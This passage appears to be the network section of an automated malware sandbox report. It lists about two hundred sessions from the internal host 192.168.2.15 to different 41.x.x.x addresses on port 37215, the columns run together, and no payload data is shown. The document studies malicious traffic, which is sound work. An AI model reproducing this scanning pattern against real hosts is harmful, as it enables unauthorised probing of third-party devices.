                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23982192.168.2.154088641.207.49.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23983192.168.2.155661041.3.108.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23984192.168.2.154960641.165.177.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23985192.168.2.156070641.71.139.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23986192.168.2.153683241.24.2.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23987192.168.2.154152441.200.145.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23988192.168.2.154104241.232.192.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23989192.168.2.154427241.169.153.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23990192.168.2.154002241.230.136.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23991192.168.2.155495641.144.82.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23992192.168.2.153645241.29.125.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23993192.168.2.153560841.122.194.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23994192.168.2.155685441.212.54.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23995192.168.2.153508641.181.128.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23996192.168.2.154667041.177.64.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23997192.168.2.154318441.20.181.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23998192.168.2.154306041.118.119.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23999192.168.2.154849441.14.21.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24000192.168.2.155844641.4.176.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24001192.168.2.153693441.75.253.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24002192.168.2.155345241.81.56.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24003192.168.2.154770441.194.98.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24004192.168.2.153879241.240.94.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24005192.168.2.153550641.81.249.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24006192.168.2.155963641.85.38.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24007192.168.2.153368041.193.178.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24008192.168.2.155885441.16.150.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24009192.168.2.153908641.179.75.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24010192.168.2.155557841.247.53.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24011192.168.2.155887241.48.59.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24012192.168.2.155451841.218.14.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24013192.168.2.154362841.90.170.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24014192.168.2.154498441.208.182.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24015192.168.2.154763641.88.233.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24016192.168.2.155454241.205.32.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24017192.168.2.154668241.12.220.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24018192.168.2.154257241.26.129.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24019192.168.2.153570441.1.110.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24020192.168.2.153500041.180.67.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24021192.168.2.156072041.78.75.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24022192.168.2.153919041.184.108.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24023192.168.2.155459441.128.152.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24024192.168.2.154849041.1.80.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24025192.168.2.155210841.203.134.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24026192.168.2.153935241.76.218.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24027192.168.2.155089441.164.245.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24028192.168.2.154321841.99.46.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24029192.168.2.154566041.37.252.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24030192.168.2.154178441.47.28.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24031192.168.2.155729041.91.2.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24032192.168.2.155735441.28.252.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24033192.168.2.154896841.162.143.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24034192.168.2.154448641.207.97.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24035192.168.2.154279641.44.68.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24036192.168.2.155110841.17.222.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24037192.168.2.154283041.70.65.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24038192.168.2.154403441.37.94.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24039192.168.2.155138441.126.114.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24040192.168.2.155776641.40.19.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24041192.168.2.153872041.84.145.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24042192.168.2.153678441.184.84.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24043192.168.2.155413641.7.96.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24044192.168.2.154475241.234.229.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24045192.168.2.155180641.158.100.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24046192.168.2.154147841.78.67.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24047192.168.2.155393841.57.83.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24048192.168.2.154117441.155.40.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24049192.168.2.155136841.68.27.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24050192.168.2.154052641.227.205.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24051192.168.2.154276841.23.178.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24052192.168.2.155512841.7.252.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24053192.168.2.154504041.184.4.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24054192.168.2.154780441.195.162.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24055192.168.2.153339441.4.41.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24056192.168.2.155160041.130.101.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24057192.168.2.155668241.84.250.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24058192.168.2.155904241.38.51.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24059192.168.2.154652441.172.221.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24060192.168.2.153863241.86.105.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24061192.168.2.156083441.218.25.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24062192.168.2.154573241.22.181.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24063192.168.2.154450041.3.203.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24064192.168.2.154040041.126.93.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24065192.168.2.154950041.88.104.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24066192.168.2.153534641.168.169.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24067192.168.2.153669041.234.10.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24068192.168.2.155756241.59.232.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24069192.168.2.155559041.247.224.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24070192.168.2.155237641.107.243.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24071192.168.2.155332041.235.151.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24072192.168.2.155125241.83.70.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24073192.168.2.154482241.105.151.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24074192.168.2.153999841.111.112.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24075192.168.2.153881041.238.92.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24076192.168.2.153621641.229.119.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24077192.168.2.153911641.231.15.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24078192.168.2.155196441.55.195.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24079192.168.2.153602441.140.42.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24080192.168.2.155517841.215.224.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24081192.168.2.155709241.250.96.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24082192.168.2.154069841.161.159.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24083192.168.2.154835641.136.196.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24084192.168.2.154995641.65.88.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24085192.168.2.154369441.238.127.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24086192.168.2.154540441.175.103.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24087192.168.2.154897041.87.101.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24088192.168.2.156036041.144.24.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24089192.168.2.154599241.153.133.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24090192.168.2.153667241.226.71.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24091192.168.2.155418641.85.154.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24092192.168.2.155869441.201.69.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24093192.168.2.153915841.35.18.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24094192.168.2.155887641.173.111.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24095192.168.2.154798441.193.104.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24096192.168.2.154983441.119.156.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24097192.168.2.153322441.158.251.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24098192.168.2.154437241.50.3.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24099192.168.2.154957041.82.99.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24100192.168.2.153811041.14.180.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24101192.168.2.154165841.181.60.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24102192.168.2.154475441.20.108.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24103192.168.2.155036641.85.159.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24104192.168.2.155178441.81.217.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24105192.168.2.155928041.41.170.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24106192.168.2.153422641.9.114.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24107192.168.2.154232641.214.138.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24108192.168.2.155378441.210.191.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24109192.168.2.153418441.113.136.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24110192.168.2.154760841.214.206.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24111192.168.2.153566841.208.97.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24112192.168.2.155471841.238.226.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24113192.168.2.155792441.4.105.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24114192.168.2.155826241.64.66.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24115192.168.2.154214641.116.204.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24116192.168.2.155128641.231.75.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24117192.168.2.154496041.77.135.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24118192.168.2.155140441.98.196.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24119192.168.2.153538441.18.119.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24120192.168.2.153925641.179.214.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24121192.168.2.155646641.177.88.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24122192.168.2.153374441.76.58.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24123192.168.2.154105041.234.7.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24124192.168.2.156088641.164.18.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24125192.168.2.155085441.92.213.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24126192.168.2.155279641.18.254.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24127192.168.2.156079841.255.237.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24128192.168.2.155932441.200.236.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24129192.168.2.155616641.159.65.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24130192.168.2.154772041.178.108.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24131192.168.2.153734841.20.41.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24132192.168.2.154210241.96.198.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24133192.168.2.154051441.69.77.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24134192.168.2.154621641.245.151.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24135192.168.2.155927041.159.72.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24136192.168.2.153729241.131.38.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24137192.168.2.155168441.117.99.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24138192.168.2.155971441.43.38.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24139192.168.2.155842641.192.122.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24140192.168.2.153849641.73.79.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24141192.168.2.154526641.28.95.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24142192.168.2.155292241.174.239.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24143192.168.2.153421041.80.225.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24144192.168.2.155826641.54.98.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24145192.168.2.154679441.18.183.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24146192.168.2.153940641.245.154.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24147192.168.2.153496041.5.168.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24148192.168.2.155647041.154.63.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24149192.168.2.153931241.159.247.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24150192.168.2.154217041.26.240.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24151192.168.2.153530241.137.131.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24152192.168.2.154373441.212.201.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24153192.168.2.154855041.205.34.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24154192.168.2.155955041.243.220.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24155192.168.2.155267841.111.229.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24156192.168.2.153607441.200.35.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24157192.168.2.155158841.16.25.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24158192.168.2.154908241.146.95.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24159192.168.2.153562841.81.139.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24160192.168.2.156003641.138.88.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24161192.168.2.154844041.107.178.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24162192.168.2.155471041.216.83.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24163192.168.2.154658441.129.137.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24164192.168.2.155992641.112.33.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24165192.168.2.154009041.250.132.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24166192.168.2.155455841.1.41.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24167192.168.2.154795041.6.172.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24168192.168.2.153743841.26.128.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24169192.168.2.155085641.6.91.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24170192.168.2.154725441.168.32.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24171192.168.2.155867641.3.161.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24172192.168.2.153584841.56.159.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24173192.168.2.154773441.155.247.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24174192.168.2.155782441.153.200.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24175192.168.2.153603841.225.18.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24176192.168.2.154181841.73.96.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24177192.168.2.154213441.87.94.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24178192.168.2.154658641.223.17.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24179192.168.2.155452441.159.163.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24180192.168.2.153726241.60.90.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24181192.168.2.154035441.211.9.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24182192.168.2.154876841.33.165.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24183192.168.2.154304041.244.79.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24184192.168.2.155143641.40.172.6637215
